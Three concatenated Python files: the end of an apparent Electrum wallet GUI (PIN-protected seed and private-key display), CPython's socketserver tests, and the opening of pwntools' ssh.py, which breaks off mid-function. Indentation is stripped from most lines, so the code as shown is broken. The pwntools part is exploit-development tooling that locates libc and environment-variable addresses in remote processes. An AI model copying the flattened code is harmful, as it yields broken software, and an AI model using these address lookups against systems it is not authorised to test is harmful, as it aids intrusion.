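    # `password` is None for unencrypted wallets, the PIN string otherwise.
    pass
# Illustrative call: self.protected(_("Enter your PIN"), _example_gated_action, (label,))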
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
try:
import _thread
import threading
except ImportError:
threading = None
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=20):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
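# Hedged, self-contained check (not part of the original suite): receive()
# just select()s and then recv()s, so any connected socket pair exercises it.
def _receive_selftest():
    a, b = socket.socketpair()
    try:
        a.sendall(b"ping")
        assert receive(b, 4, timeout=1) == b"ping"
    finally:
        a.close()
        b.close()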
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
_block_on_close = True
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
_block_on_close = True
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
pid2, status = os.waitpid(pid, 0)
testcase.assertEqual(pid2, pid)
testcase.assertEqual(72 << 8, status)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
_block_on_close = True
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
server = MyServer(addr, MyHandler)
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_STREAM)
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def dgram_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_DGRAM)
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
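# Hedged sketch (not part of the suite): the examine helpers above just do a
# line-echo round trip. The same exchange against a throwaway TCP echo server
# looks like this; names starting with _ are illustrative.
def _echo_roundtrip_demo():
    class _Echo(socketserver.StreamRequestHandler):
        def handle(self):
            self.wfile.write(self.rfile.readline())
    with socketserver.TCPServer((HOST, 0), _Echo) as server:
        t = threading.Thread(target=server.serve_forever,
                             kwargs={'poll_interval': 0.01})
        t.daemon = True
        t.start()
        with socket.create_connection(server.server_address) as s:
            s.sendall(TEST_STR)
            buf = data = receive(s, 100)
            while data and b'\n' not in buf:
                data = receive(s, 100)
                buf += data
        server.shutdown()
        t.join()
    assert buf == TEST_STR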
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making
# another thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this results
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
reap_children()
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
_block_on_close = True
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
_block_on_close = True
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
ssh.py
|
from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context, LocalContext
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import packing
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(open(os.devnull,'w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
if isinstance(wd, six.text_type):
wd = packing._need_bytes(wd, 2, 0x80)
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = b' '.join(sh_string(packing._need_bytes(s, 2, 0x80)) for s in process)
if isinstance(process, six.text_type):
process = packing._need_bytes(process, 2, 0x80)
if process and wd:
process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1; ' + process
if process and env:
for name, value in env.items():
nameb = packing._need_bytes(name, 2, 0x80)
if not re.match(b'^[a-zA-Z_][a-zA-Z0-9_]*$', nameb):
self.error('run(): Invalid environment key %r' % name)
export = b'export %s=%s;' % (nameb, sh_string(packing._need_bytes(value, 2, 0x80)))
process = export + process
if process and tty:
if raw:
process = b'stty raw -ctlecho -echo; ' + process
else:
process = b'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
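# Hedged sketch (not part of pwntools): the constructor above prefixes the
# remote command with `export NAME=value;` for each environment entry after
# checking the name against a shell-safe pattern. The same check and prefix
# can be reproduced locally; sh_string() is the real quoting helper, and
# shlex.quote is used here only as a stand-in.
def _export_prefix_demo(env):
    import re
    import shlex
    prefix = ''
    for name, value in env.items():
        if not re.match(r'^[a-zA-Z_][a-zA-Z0-9_]*$', name):
            raise ValueError('Invalid environment key %r' % name)
        prefix += 'export %s=%s;' % (name, shlex.quote(value))
    return prefix
# _export_prefix_demo({'PS1': ''}) -> "export PS1='';"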
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
tmp_close = self.close
self.close = lambda: None
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.close = tmp_close
self.sock = tmp_sock
self.wait()
self.close()
# Again set self.sock to None
self.sock = None
return data
def wait(self, timeout=sock.default):
# TODO: deal with timeouts
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode is None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
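# Hedged usage sketch (same doctest style and placeholder host as the rest of
# this module; not an original doctest):
#
#   >>> s = ssh(host='example.pwnme')
#   >>> ch = s.run('exit 3')
#   >>> ch.wait()        # blocks until the remote process exits
#   3
#   >>> ch.poll()        # later polls return the cached exit status
#   3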
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
:meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(b'\r\n',b'\n')
cur = cur.replace(b'\r',b'')
if cur is None:
continue
elif cur == b'\a':
# Ugly hack until term understands bell characters
continue
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if not data:
event.set()
else:
data = bytearray(data)
if data:
try:
self.send(bytes(bytearray(data)))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the process
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the path of each library loaded by the
process to its base address in the process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid).decode()
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
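# Hedged sketch (not part of pwntools): libs() above pulls the load address
# out of /proc/<pid>/maps by taking the text before the first '-' on the
# matching line and parsing it as hex. The sample line is illustrative.
def _maps_base_address(line):
    # e.g. "7f1c2e000000-7f1c2e1c0000 r-xp 00000000 08:01 1234  /lib/libc.so.6"
    return int(line.split('-')[0], 16)
# _maps_base_address("7f1c2e000000-7f1c2e1c0000 r-xp ... /lib/libc.so.6") == 0x7f1c2e000000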
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process('true')
>>> p.libc # doctest: +ELLIPSIS
ELF('.../libc.so.6')
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
r"""Retrieve the address of an environment variable in the remote process.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process(['python', '-c', 'import time; time.sleep(10)'])
>>> hex(p.getenv('PATH')) # doctest: +ELLIPSIS
'0x...'
"""
argv0 = self.argv[0]
variable = bytearray(packing._need_bytes(variable, min_wrong=0x80))
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'getenv = libc.getenv',
'getenv.restype = c_void_p',
'print(os.path.realpath(%r))' % self.executable,
'print(getenv(bytes(%r)))' % variable,))
try:
with context.quiet:
python = self.parent.which('python2.7') or self.parent.which('python3') or self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvall())
address -= len(python)
address += len(path)
return int(address) & context.mask
except Exception:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(str(e))
raise
try:
# Iterate all layers of proxying to get to base-level Socket object
curr = self.sock.get_transport().sock
while getattr(curr, "get_transport", None):
curr = curr.get_transport().sock
sockname = curr.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
except Exception as e:
self.exception("Could not find base-level Socket object.")
raise e
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
self.exception('Failed to create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
_cwd = '.'
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, ignore_config=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
ignore_config: If :const:`True`, disable usage of ~/.ssh/config and ~/.ssh/authorized_keys
NOTE: The proxy_command and proxy_sock arguments are only available if a
fairly new version of paramiko is used.
Example proxying:
.. doctest::
:skipif: True
>>> s1 = ssh(host='example.pwnme')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme', proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
